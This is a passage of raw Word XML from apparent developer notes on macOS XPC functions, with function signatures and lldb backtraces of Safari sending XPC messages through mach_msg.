          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="666666"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>xpc_connection_t</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00995B76" w:rsidRDefault="00995B76" w:rsidP="00995B76">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="109" w:after="218"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="666666"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLTypewriter"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="666666"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLTypewriter"/>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>xpc</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connection</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create</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mach</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service</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLTypewriter"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="666666"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLTypewriter"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="666666"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>const</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char</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name</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dispatch_queue_t</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targetq</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uint64_t</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flags</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLTypewriter"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="666666"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00995B76" w:rsidRDefault="00995B76" w:rsidP="00B65EF6">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="220"/>
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Regular" w:hAnsi="Menlo-Regular" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00ED35B9" w:rsidRDefault="00ED35B9" w:rsidP="00B65EF6">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="220"/>
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Regular" w:hAnsi="Menlo-Regular" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00ED35B9" w:rsidRDefault="00ED35B9" w:rsidP="00ED35B9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="160" w:name="_Toc445313362"/>
      <w:r w:rsidRPr="00995B76">
        <w:t>xpc_connection_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>get_name</w:t>
      </w:r>
      <w:bookmarkEnd w:id="160"/>
      <w:r w:rsidRPr="00B65EF6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED35B9" w:rsidRDefault="00ED35B9" w:rsidP="00B65EF6">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="220"/>
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Regular" w:hAnsi="Menlo-Regular" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00ED35B9" w:rsidRDefault="00ED35B9" w:rsidP="00ED35B9">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="109" w:after="218"/>
        <w:rPr>
          <w:rStyle w:val="HTMLTypewriter"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="666666"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pP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const</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char</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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED35B9" w:rsidRDefault="00ED35B9" w:rsidP="00ED35B9">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="109" w:after="218"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="666666"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLTypewriter"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="666666"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLTypewriter"/>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>xpc</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connection</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get</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLTypewriter"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="666666"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLTypewriter"/>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="666666"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLTypewriter"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="666666"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLTypewriter"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="666666"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>xpc_connection_t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLTypewriter"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="666666"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLTypewriter"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="666666"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>connection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLTypewriter"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="666666"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED35B9" w:rsidRPr="00ED35B9" w:rsidRDefault="00ED35B9" w:rsidP="00B65EF6">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="220"/>
        <w:rPr>
          <w:rFonts w:ascii="Menlo-Regular" w:hAnsi="Menlo-Regular" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B65EF6" w:rsidRDefault="00B65EF6" w:rsidP="00B65EF6">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="220"/>
        <w:rPr>
          <w:sz w:val="2"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B65EF6" w:rsidRDefault="00B65EF6" w:rsidP="00B65EF6">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="161" w:name="_Toc445313363"/>
      <w:r w:rsidRPr="00B65EF6">
        <w:t>xpc_connection_send_message_with_reply_sync</w:t>
      </w:r>
      <w:bookmarkEnd w:id="161"/>
    </w:p>
    <w:p w:rsidR="00D917D5" w:rsidRPr="00D917D5" w:rsidRDefault="00D917D5" w:rsidP="00D917D5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D917D5">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>(lldb) bt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D917D5" w:rsidRPr="00D917D5" w:rsidRDefault="00D917D5" w:rsidP="00D917D5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D917D5">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>* thread #1: tid = 0xaf8c9, 0x00007fff89404790 libsystem_kernel.dylib`mach_msg, queue = 'com.apple.main-thread', stop reason = breakpoint 3.1 6.1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D917D5" w:rsidRPr="00D917D5" w:rsidRDefault="00D917D5" w:rsidP="00D917D5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D917D5">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  * frame #0: 0x00007fff89404790 libsystem_kernel.dylib`mach_msg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D917D5" w:rsidRPr="00D917D5" w:rsidRDefault="00D917D5" w:rsidP="00D917D5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D917D5">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    frame #1: 0x00007fff893f92d8 libsystem_kernel.dylib`host_create_mach_voucher + 162</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D917D5" w:rsidRPr="00D917D5" w:rsidRDefault="00D917D5" w:rsidP="00D917D5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D917D5">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    frame #2: 0x00007fff87a302d9 libdispatch.dylib`_voucher_create_mach_voucher_with_priority + 336</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D917D5" w:rsidRPr="00D917D5" w:rsidRDefault="00D917D5" w:rsidP="00D917D5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D917D5">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    frame #3: 0x00007fff87a2fa54 libdispatch.dylib`_dispatch_mach_msg_send + 385</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D917D5" w:rsidRPr="00D917D5" w:rsidRDefault="00D917D5" w:rsidP="00D917D5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D917D5">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    frame #4: 0x00007fff87a2f810 libdispatch.dylib`dispatch_mach_send + 262</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D917D5" w:rsidRPr="00D917D5" w:rsidRDefault="00D917D5" w:rsidP="00D917D5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D917D5">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    frame #5: 0x00007fff92ab7a89 libxpc.dylib`xpc_connection_send_message + 76</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D917D5" w:rsidRPr="00D917D5" w:rsidRDefault="00D917D5" w:rsidP="00D917D5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D917D5">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    frame #6: 0x00007fff8a3bbb71 CoreFoundation`_CFXNotificationSetSuspended + 209</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D917D5" w:rsidRPr="00D917D5" w:rsidRDefault="00D917D5" w:rsidP="00D917D5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D917D5">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    frame #7: 0x00007fff917a2107 HIToolbox`CreateEventWithCGEvent + 4712</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D917D5" w:rsidRPr="00D917D5" w:rsidRDefault="00D917D5" w:rsidP="00D917D5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D917D5">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    frame #8: 0x00007fff917a0ad5 HIToolbox`CreateAndPostEventWithCGEvent(__CGEvent*, unsigned int, unsigned char, __CFMachPortBoost*) + 75</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D917D5" w:rsidRPr="00D917D5" w:rsidRDefault="00D917D5" w:rsidP="00D917D5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D917D5">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    frame #9: 0x00007fff917abe32 HIToolbox`Convert1CGEvent(unsigned char) + 255</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D917D5" w:rsidRPr="00D917D5" w:rsidRDefault="00D917D5" w:rsidP="00D917D5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D917D5">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    frame #10: 0x00007fff917abcd3 HIToolbox`MainLoopObserver(unsigned int, OpaqueEventRef*, void*) + 41</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D917D5" w:rsidRPr="00D917D5" w:rsidRDefault="00D917D5" w:rsidP="00D917D5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D917D5">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    frame #11: 0x00007fff9176df96 HIToolbox`_NotifyEventLoopObservers + 155</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D917D5" w:rsidRPr="00D917D5" w:rsidRDefault="00D917D5" w:rsidP="00D917D5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D917D5">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    frame #12: 0x00007fff9179691f HIToolbox`RunCurrentEventLoopInMode + 213</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D917D5" w:rsidRPr="00D917D5" w:rsidRDefault="00D917D5" w:rsidP="00D917D5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D917D5">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    frame #13: 0x00007fff91796677 HIToolbox`ReceiveNextEventCommon + 184</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D917D5" w:rsidRPr="00D917D5" w:rsidRDefault="00D917D5" w:rsidP="00D917D5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D917D5">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    frame #14: 0x00007fff917965af HIToolbox`_BlockUntilNextEventMatchingListInModeWithFilter + 71</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D917D5" w:rsidRPr="00D917D5" w:rsidRDefault="00D917D5" w:rsidP="00D917D5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D917D5">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    frame #15: 0x00007fff961870ee AppKit`_DPSNextEvent + 1067</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D917D5" w:rsidRPr="00D917D5" w:rsidRDefault="00D917D5" w:rsidP="00D917D5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D917D5">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    frame #16: 0x00007fff96553943 AppKit`-[NSApplication _nextEventMatchingEventMask:untilDate:inMode:dequeue:] + 454</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D917D5" w:rsidRPr="00D917D5" w:rsidRDefault="00D917D5" w:rsidP="00D917D5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D917D5">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    frame #17: 0x00007fff8fd9e37f Safari`-[BrowserApplication nextEventMatchingMask:untilDate:inMode:dequeue:] + 252</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D917D5" w:rsidRPr="00D917D5" w:rsidRDefault="00D917D5" w:rsidP="00D917D5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D917D5">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    frame #18: 0x00007fff9617cfc8 AppKit`-[NSApplication run] + 682</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D917D5" w:rsidRPr="00D917D5" w:rsidRDefault="00D917D5" w:rsidP="00D917D5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D917D5">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    frame #19: 0x00007fff960ff520 AppKit`NSApplicationMain + 1176</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D917D5" w:rsidRPr="00D917D5" w:rsidRDefault="00D917D5" w:rsidP="00D917D5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D917D5">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    frame #20: 0x00007fff913405ad libdyld.dylib`start + 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D917D5" w:rsidRPr="00D917D5" w:rsidRDefault="00D917D5" w:rsidP="00D917D5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D917D5">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    frame #21: 0x00007fff913405ad libdyld.dylib`start + 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D917D5" w:rsidRPr="00D917D5" w:rsidRDefault="00D917D5" w:rsidP="00D917D5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D917D5">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">(lldb) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D917D5" w:rsidRPr="00D917D5" w:rsidRDefault="00D917D5" w:rsidP="00D917D5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D917D5" w:rsidRPr="00D917D5" w:rsidRDefault="00D917D5" w:rsidP="00D917D5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D917D5" w:rsidRPr="00D917D5" w:rsidRDefault="00D917D5" w:rsidP="00D917D5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D917D5" w:rsidRPr="00D917D5" w:rsidRDefault="00D917D5" w:rsidP="00D917D5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D917D5">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>(lldb) bt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D917D5" w:rsidRPr="00D917D5" w:rsidRDefault="00D917D5" w:rsidP="00D917D5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D917D5">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>* thread #1: tid = 0xaf8c9, 0x00007fff89404790 libsystem_kernel.dylib`mach_msg, queue = 'com.apple.main-thread', stop reason = breakpoint 3.1 6.1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D917D5" w:rsidRPr="00D917D5" w:rsidRDefault="00D917D5" w:rsidP="00D917D5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D917D5">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  * frame #0: 0x00007fff89404790 libsystem_kernel.dylib`mach_msg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D917D5" w:rsidRPr="00D917D5" w:rsidRDefault="00D917D5" w:rsidP="00D917D5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D917D5">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    frame #1: 0x00007fff87a2fd50 libdispatch.dylib`_dispatch_mach_msg_send + 1149</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D917D5" w:rsidRPr="00D917D5" w:rsidRDefault="00D917D5" w:rsidP="00D917D5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D917D5">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    frame #2: 0x00007fff87a2f810 libdispatch.dylib`dispatch_mach_send + 262</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D917D5" w:rsidRPr="00D917D5" w:rsidRDefault="00D917D5" w:rsidP="00D917D5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D917D5">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    frame #3: 0x00007fff92ab7a89 libxpc.dylib`xpc_connection_send_message + 76</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D917D5" w:rsidRPr="00D917D5" w:rsidRDefault="00D917D5" w:rsidP="00D917D5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D917D5">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    frame #4: 0x00007fff8a3bbb71 CoreFoundation`_CFXNotificationSetSuspended + 209</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D917D5" w:rsidRPr="00D917D5" w:rsidRDefault="00D917D5" w:rsidP="00D917D5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D917D5">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    frame #5: 0x00007fff917a2107 HIToolbox`CreateEventWithCGEvent + 4712</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D917D5" w:rsidRPr="00D917D5" w:rsidRDefault="00D917D5" w:rsidP="00D917D5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D917D5">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    frame #6: 0x00007fff917a0ad5 HIToolbox`CreateAndPostEventWithCGEvent(__CGEvent*, unsigned int, unsigned char, __CFMachPortBoost*) + 75</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D917D5" w:rsidRPr="00D917D5" w:rsidRDefault="00D917D5" w:rsidP="00D917D5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D917D5">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    frame #7: 0x00007fff917abe32 HIToolbox`Convert1CGEvent(unsigned char) + 255</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D917D5" w:rsidRPr="00D917D5" w:rsidRDefault="00D917D5" w:rsidP="00D917D5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D917D5">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    frame #8: 0x00007fff917abcd3 HIToolbox`MainLoopObserver(unsigned int, OpaqueEventRef*, void*) + 41</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D917D5" w:rsidRPr="00D917D5" w:rsidRDefault="00D917D5" w:rsidP="00D917D5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D917D5">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    frame #9: 0x00007fff9176df96 HIToolbox`_NotifyEventLoopObservers + 155</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D917D5" w:rsidRPr="00D917D5" w:rsidRDefault="00D917D5" w:rsidP="00D917D5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D917D5">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    frame #10: 0x00007fff9179691f HIToolbox`RunCurrentEventLoopInMode + 213</w:t>
      </w:r>
    </w:p>
